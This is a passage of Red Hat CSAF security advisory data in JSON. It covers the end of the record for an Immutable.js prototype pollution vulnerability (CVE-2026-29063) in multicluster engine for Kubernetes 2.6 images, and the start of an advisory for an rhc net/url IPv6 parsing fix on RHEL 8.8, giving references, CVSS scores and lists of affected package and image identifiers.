"self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-29063"}, {"category": "external", "summary": "RHBZ#2445291", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063", "url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5", "url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"}, {"category": "external", "summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw", "url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"}], "release_date": "2026-03-06T18:25:22.438000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T17:54:30+00:00", "details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.11/html/clusters/cluster_mce_overview#mce-install-intro", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9848"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "products": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:ecc19a7bbdce3c0328fff1da64ae4f3959c9d0a67400cea11744bc5d336853ee_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9848"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for rhc is now available for Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions and Red Hat Enterprise Linux 8.8 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "rhc is a client tool and daemon that connects the system to Red Hat hosted services enabling system and subscription management.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9695", "url": "https://access.redhat.com/errata/RHSA-2026:9695"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9695.json"}], "title": "Red Hat Security Advisory: rhc security update", "tracking": {"current_release_date": "2026-06-08T15:52:52+00:00", "generator": {"date": "2026-06-08T15:52:52+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9695", "initial_release_date": "2026-04-22T11:44:28+00:00", "revision_history": [{"date": "2026-04-22T11:44:28+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-22T11:44:28+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:52+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.8.8)", "product_id": "AppStream-8.8.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:8.8::appstream"}}}, {"category": "product_name", "name": "Red Hat Enterprise Linux AppStream TUS (v.8.8)", "product": {"name": "Red Hat Enterprise Linux AppStream TUS (v.8.8)", "product_id": "AppStream-8.8.0.Z.TUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_tus:8.8::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.2-1.el8_8.2.src", "product": {"name": "rhc-1:0.2.2-1.el8_8.2.src", "product_id": "rhc-1:0.2.2-1.el8_8.2.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.2-1.el8_8.2?arch=src&epoch=1"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.2-1.el8_8.2.ppc64le", "product": {"name": "rhc-1:0.2.2-1.el8_8.2.ppc64le", "product_id": "rhc-1:0.2.2-1.el8_8.2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.2-1.el8_8.2?arch=ppc64le&epoch=1"}}}, {"category": "product_version", "name": "rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "product": {"name": "rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "product_id": "rhc-debugsource-1:0.2.2-1.el8_8.2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debugsource@0.2.2-1.el8_8.2?arch=ppc64le&epoch=1"}}}, {"category": "product_version", "name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "product": {"name": "rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "product_id": "rhc-debuginfo-1:0.2.2-1.el8_8.2.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc-debuginfo@0.2.2-1.el8_8.2?arch=ppc64le&epoch=1"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "rhc-1:0.2.2-1.el8_8.2.x86_64", "product": {"name": "rhc-1:0.2.2-1.el8_8.2.x86_64", "product_id": "rhc-1:0.2.2-1.el8_8.2.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/rhc@0.2.2-1.el8_8.2?arch=x86_64&epoch=1"}}}, {"category": 